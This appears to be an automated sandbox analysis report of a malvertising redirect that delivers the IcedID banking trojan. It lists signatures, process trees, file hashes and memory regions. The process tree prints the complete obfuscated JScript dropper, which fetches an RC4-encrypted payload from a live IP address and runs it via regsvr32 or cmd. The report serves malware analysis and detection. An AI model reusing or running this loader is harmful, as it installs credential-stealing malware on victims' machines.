Resubmissions

28-09-2022 06:46

220928-hjzwasfca3 1

28-09-2022 06:44

220928-hhwggsgchk 1

28-09-2022 06:35

220928-hcrlcafbg3 10

28-09-2022 06:33

220928-hblcyafbf9 1

Analysis

  • max time kernel
    261s
  • max time network
    263s
  • platform
    windows10-1703_x64
  • resource
    win10-20220812-en
  • resource tags

    arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
  • submitted
    28-09-2022 06:35

General

  • Target

    http://quarrelaimless.com/9b3cd056?nphmy=56&refer=https://mixdrop.co/f/ql3ndw6eb3ndw7&kw=["mixdrop","-","watch","beast","2022","720p","amzn","webrip","800mb","x264-galaxyrg"]&key=b8ec1bba676d04d104b756970b8e0395&scrWidth=1600&scrHeight=900&tz=-7&v=22.8.v.2&ship=&sub3=invoke_new&res=13.31&dev=r&psid=mixdrop.co&adb=n

Malware Config

Extracted

Family

icedid

Campaign

1776411935

Signatures

  • IcedID, BokBot

    IcedID is a banking trojan capable of stealing credentials.

  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 49 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" http://quarrelaimless.com/9b3cd056?nphmy=56&refer=https://mixdrop.co/f/ql3ndw6eb3ndw7&kw=["mixdrop","-","watch","beast","2022","720p","amzn","webrip","800mb","x264-galaxyrg"]&key=b8ec1bba676d04d104b756970b8e0395&scrWidth=1600&scrHeight=900&tz=-7&v=22.8.v.2&ship=&sub3=invoke_new&res=13.31&dev=r&psid=mixdrop.co&adb=n
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2900
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2900 CREDAT:82945 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:348
      • C:\Windows\SysWOW64\cmd.exe
        cmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/["WaitFor"+"Response"]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinH"+"ttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";s[Y]=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp "dgdfg3453e" "http://188.227.106.62/?MzcwODIy&VihE&xcvxv4efxf=SLtNP07OH06UgdrahK2PQ9nBKGnihLH5UUSk6B2aClzhofEkeLpQbwDjjkPRLQcym49eW18U9Piv20CDyh7IgJDR_xSKUQ9Fz8_VF7AL&dxcvxcssrgd=zec&cvbcvdfsdf=zec&cvxcv33443=znzQMvXcJwDQC4HJKeXD&dfccvbcxvxvc=120clto.105gh85.406y0c8n6&mhBeYNTA2Mg==" "2"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4732
        • C:\Windows\SysWOW64\wscript.exe
          wsCripT //B //E:JScript 3.tMp "dgdfg3453e" "http://188.227.106.62/?MzcwODIy&VihE&xcvxv4efxf=SLtNP07OH06UgdrahK2PQ9nBKGnihLH5UUSk6B2aClzhofEkeLpQbwDjjkPRLQcym49eW18U9Piv20CDyh7IgJDR_xSKUQ9Fz8_VF7AL&dxcvxcssrgd=zec&cvbcvdfsdf=zec&cvxcv33443=znzQMvXcJwDQC4HJKeXD&dfccvbcxvxvc=120clto.105gh85.406y0c8n6&mhBeYNTA2Mg==" "2"
          4⤵
          • Blocklisted process makes network request
          • Suspicious use of WriteProcessMemory
          PID:3616
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c xk5l0.exe
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:4840
            • C:\Users\Admin\AppData\Local\Temp\xk5l0.exe
              xk5l0.exe
              6⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              PID:4364

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

1
T1112

Discovery

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
    Filesize

    471B

    MD5

    e12c82661cf68cf0eb64f50e0c68ce34

    SHA1

    a92b301c88611dfbd05a56b2d2758c0301e9cee7

    SHA256

    1ff3db3a11352a904d8ff5e2943786ffa250630a2d6a90375c8fb65557d3d251

    SHA512

    71eb9c0a25e1c39c215713d6c06c7068f861c73a54b07965e28e7125524726a70c6b335c48d1c5a6373673c3a76227dbd3f8a4c09ed4d858967ec112d30e7edf

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
    Filesize

    404B

    MD5

    35690079708456082bc16ae75c7d4ac0

    SHA1

    cadb6bfc5321894432a5ffd8f61fd2b44e54b0ee

    SHA256

    aa7a364400a7ae22e768d6f646ba5a1d2eec9878852ae951bca3fe9708c7b72b

    SHA512

    4cf569ebd7f61ba227cfe1e1723451ccd311290b15c8f1ed3fad3812e9b88241b05e507b1c1e356f6e219ac5fa7269080700b8b50a026c0624a56a7fb2afe17f

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\EQJSPHAC.cookie
    Filesize

    615B

    MD5

    f6f39bea2d7026644fa8fb9dcbd1f0ce

    SHA1

    577390afb91a745ffc7bebea2a7db55ac3ba88d4

    SHA256

    c14be211c861c36197816f59face054ece45164022b1095ca9eb0ebabfab0f9f

    SHA512

    bb115562125c42fa0a879687944c2f3e297c3a5d187328ec4c8b39d63f8502fb2bec49aaae77029c2513ebd837dc3433082ca927eca74316cf17439e8c15a93b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\HCO4Z4FC.cookie
    Filesize

    615B

    MD5

    7718cd5adf73fc377eb1892b33da5007

    SHA1

    c9fecffd1b93b2463d731b3f2c9343b1171d2f86

    SHA256

    9a5dd98a76d87c282ae3abd94c8ff16eced3b77d845061dbe7702caf68d3b49f

    SHA512

    13558d584b6e8988e0502bac122d3a6a90cd252a689a2cca3544ebe9ab1c77874935dc19e403e1792e29e667362774ca6a5819c7f5d1784c9efced296ba4b209

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\TVSMD7KX.cookie
    Filesize

    156B

    MD5

    0d2cde048facbf4f6b6d94999b4807fc

    SHA1

    9a1ddc7d79354dc624fac8901330ca542d604e5f

    SHA256

    0b861de2bfbb71f7d4cb1786d0c834f767b334b9189305e2c7e659d83d3e316e

    SHA512

    86106b52b1babf8f2892fa8e8a51e6aaff94cfd5b2c99d491fe94b2f299814f7c592d0a4d3bcd26e723f9f1bfee0a0201f5781a31d2eb7abd4396d193e0bba4c

  • C:\Users\Admin\AppData\Local\Temp\3.tMp
    Filesize

    1KB

    MD5

    8607957915e0fbf5fb229b406597d05e

    SHA1

    dc7f4d9858016a8d812197cca6c3977c9da6827f

    SHA256

    5fcda8542072c55ef053fce8c9b66b380505a608b30b29f10e36d0cd8581f22d

    SHA512

    32cec81259c42fba1c8756c38ca68435dd21c3fea371a49dbe0c3a7bb31bc97af5fa1d3d6178d784c115168d4110619a232105703752ab2b7dce33d0cd82cacd

  • C:\Users\Admin\AppData\Local\Temp\xk5l0.exe
    Filesize

    416KB

    MD5

    1d8a5cf29136b0a33402645100b4f72e

    SHA1

    bbb4356c5b04f9dd8b9bcf7f663646cbe0b7af62

    SHA256

    b6b4a5060b407aee5d4724efaca8f8336f74989cbd590bb175479d8bb08d3126

    SHA512

    4775af8994f497aa351ba8cc95bafb1581fa738bc287ad0a870552c11010e8587606a19b5d946138dc409397fc83e201a5eb88df771c34f11df37ad8f3e95db5

  • C:\Users\Admin\AppData\Local\Temp\xk5l0.exe
    Filesize

    416KB

    MD5

    1d8a5cf29136b0a33402645100b4f72e

    SHA1

    bbb4356c5b04f9dd8b9bcf7f663646cbe0b7af62

    SHA256

    b6b4a5060b407aee5d4724efaca8f8336f74989cbd590bb175479d8bb08d3126

    SHA512

    4775af8994f497aa351ba8cc95bafb1581fa738bc287ad0a870552c11010e8587606a19b5d946138dc409397fc83e201a5eb88df771c34f11df37ad8f3e95db5

  • memory/3616-158-0x0000000076FE0000-0x000000007716E000-memory.dmp
    Filesize

    1.6MB

  • memory/3616-133-0x0000000076FE0000-0x000000007716E000-memory.dmp
    Filesize

    1.6MB

  • memory/3616-130-0x0000000076FE0000-0x000000007716E000-memory.dmp
    Filesize

    1.6MB

  • memory/3616-131-0x0000000076FE0000-0x000000007716E000-memory.dmp
    Filesize

    1.6MB

  • memory/3616-132-0x0000000076FE0000-0x000000007716E000-memory.dmp
    Filesize

    1.6MB

  • memory/3616-159-0x0000000076FE0000-0x000000007716E000-memory.dmp
    Filesize

    1.6MB

  • memory/3616-134-0x0000000076FE0000-0x000000007716E000-memory.dmp
    Filesize

    1.6MB

  • memory/3616-136-0x0000000076FE0000-0x000000007716E000-memory.dmp
    Filesize

    1.6MB

  • memory/3616-135-0x0000000076FE0000-0x000000007716E000-memory.dmp
    Filesize

    1.6MB

  • memory/3616-164-0x0000000076FE0000-0x000000007716E000-memory.dmp
    Filesize

    1.6MB

  • memory/3616-138-0x0000000076FE0000-0x000000007716E000-memory.dmp
    Filesize

    1.6MB

  • memory/3616-139-0x0000000076FE0000-0x000000007716E000-memory.dmp
    Filesize

    1.6MB

  • memory/3616-140-0x0000000076FE0000-0x000000007716E000-memory.dmp
    Filesize

    1.6MB

  • memory/3616-141-0x0000000076FE0000-0x000000007716E000-memory.dmp
    Filesize

    1.6MB

  • memory/3616-142-0x0000000076FE0000-0x000000007716E000-memory.dmp
    Filesize

    1.6MB

  • memory/3616-143-0x0000000076FE0000-0x000000007716E000-memory.dmp
    Filesize

    1.6MB

  • memory/3616-144-0x0000000076FE0000-0x000000007716E000-memory.dmp
    Filesize

    1.6MB

  • memory/3616-145-0x0000000076FE0000-0x000000007716E000-memory.dmp
    Filesize

    1.6MB

  • memory/3616-146-0x0000000076FE0000-0x000000007716E000-memory.dmp
    Filesize

    1.6MB

  • memory/3616-147-0x0000000076FE0000-0x000000007716E000-memory.dmp
    Filesize

    1.6MB

  • memory/3616-148-0x0000000076FE0000-0x000000007716E000-memory.dmp
    Filesize

    1.6MB

  • memory/3616-149-0x0000000076FE0000-0x000000007716E000-memory.dmp
    Filesize

    1.6MB

  • memory/3616-150-0x0000000076FE0000-0x000000007716E000-memory.dmp
    Filesize

    1.6MB

  • memory/3616-151-0x0000000076FE0000-0x000000007716E000-memory.dmp
    Filesize

    1.6MB

  • memory/3616-152-0x0000000076FE0000-0x000000007716E000-memory.dmp
    Filesize

    1.6MB

  • memory/3616-153-0x0000000076FE0000-0x000000007716E000-memory.dmp
    Filesize

    1.6MB

  • memory/3616-154-0x0000000076FE0000-0x000000007716E000-memory.dmp
    Filesize

    1.6MB

  • memory/3616-155-0x0000000076FE0000-0x000000007716E000-memory.dmp
    Filesize

    1.6MB

  • memory/3616-127-0x0000000076FE0000-0x000000007716E000-memory.dmp
    Filesize

    1.6MB

  • memory/3616-157-0x0000000076FE0000-0x000000007716E000-memory.dmp
    Filesize

    1.6MB

  • memory/3616-128-0x0000000076FE0000-0x000000007716E000-memory.dmp
    Filesize

    1.6MB

  • memory/3616-161-0x0000000076FE0000-0x000000007716E000-memory.dmp
    Filesize

    1.6MB

  • memory/3616-160-0x0000000076FE0000-0x000000007716E000-memory.dmp
    Filesize

    1.6MB

  • memory/3616-162-0x0000000076FE0000-0x000000007716E000-memory.dmp
    Filesize

    1.6MB

  • memory/3616-126-0x0000000076FE0000-0x000000007716E000-memory.dmp
    Filesize

    1.6MB

  • memory/3616-129-0x0000000076FE0000-0x000000007716E000-memory.dmp
    Filesize

    1.6MB

  • memory/3616-137-0x0000000076FE0000-0x000000007716E000-memory.dmp
    Filesize

    1.6MB

  • memory/3616-165-0x0000000076FE0000-0x000000007716E000-memory.dmp
    Filesize

    1.6MB

  • memory/3616-166-0x0000000076FE0000-0x000000007716E000-memory.dmp
    Filesize

    1.6MB

  • memory/3616-167-0x0000000076FE0000-0x000000007716E000-memory.dmp
    Filesize

    1.6MB

  • memory/3616-168-0x0000000076FE0000-0x000000007716E000-memory.dmp
    Filesize

    1.6MB

  • memory/3616-169-0x0000000076FE0000-0x000000007716E000-memory.dmp
    Filesize

    1.6MB

  • memory/3616-170-0x0000000076FE0000-0x000000007716E000-memory.dmp
    Filesize

    1.6MB

  • memory/3616-171-0x0000000076FE0000-0x000000007716E000-memory.dmp
    Filesize

    1.6MB

  • memory/3616-172-0x0000000076FE0000-0x000000007716E000-memory.dmp
    Filesize

    1.6MB

  • memory/3616-173-0x0000000076FE0000-0x000000007716E000-memory.dmp
    Filesize

    1.6MB

  • memory/3616-174-0x0000000076FE0000-0x000000007716E000-memory.dmp
    Filesize

    1.6MB

  • memory/3616-175-0x0000000076FE0000-0x000000007716E000-memory.dmp
    Filesize

    1.6MB

  • memory/3616-176-0x0000000076FE0000-0x000000007716E000-memory.dmp
    Filesize

    1.6MB

  • memory/3616-177-0x0000000076FE0000-0x000000007716E000-memory.dmp
    Filesize

    1.6MB

  • memory/3616-178-0x0000000076FE0000-0x000000007716E000-memory.dmp
    Filesize

    1.6MB

  • memory/3616-179-0x0000000076FE0000-0x000000007716E000-memory.dmp
    Filesize

    1.6MB

  • memory/3616-180-0x0000000076FE0000-0x000000007716E000-memory.dmp
    Filesize

    1.6MB

  • memory/3616-181-0x0000000076FE0000-0x000000007716E000-memory.dmp
    Filesize

    1.6MB

  • memory/3616-182-0x0000000076FE0000-0x000000007716E000-memory.dmp
    Filesize

    1.6MB

  • memory/3616-122-0x0000000000000000-mapping.dmp
  • memory/3616-123-0x0000000076FE0000-0x000000007716E000-memory.dmp
    Filesize

    1.6MB

  • memory/3616-124-0x0000000076FE0000-0x000000007716E000-memory.dmp
    Filesize

    1.6MB

  • memory/3616-163-0x0000000076FE0000-0x000000007716E000-memory.dmp
    Filesize

    1.6MB

  • memory/3616-125-0x0000000076FE0000-0x000000007716E000-memory.dmp
    Filesize

    1.6MB

  • memory/4364-222-0x0000000000000000-mapping.dmp
  • memory/4364-231-0x0000000000400000-0x0000000000473000-memory.dmp
    Filesize

    460KB

  • memory/4732-116-0x0000000000000000-mapping.dmp
  • memory/4732-121-0x0000000076FE0000-0x000000007716E000-memory.dmp
    Filesize

    1.6MB

  • memory/4732-120-0x0000000076FE0000-0x000000007716E000-memory.dmp
    Filesize

    1.6MB

  • memory/4732-119-0x0000000076FE0000-0x000000007716E000-memory.dmp
    Filesize

    1.6MB

  • memory/4732-118-0x0000000076FE0000-0x000000007716E000-memory.dmp
    Filesize

    1.6MB

  • memory/4732-117-0x0000000076FE0000-0x000000007716E000-memory.dmp
    Filesize

    1.6MB

  • memory/4840-208-0x0000000000000000-mapping.dmp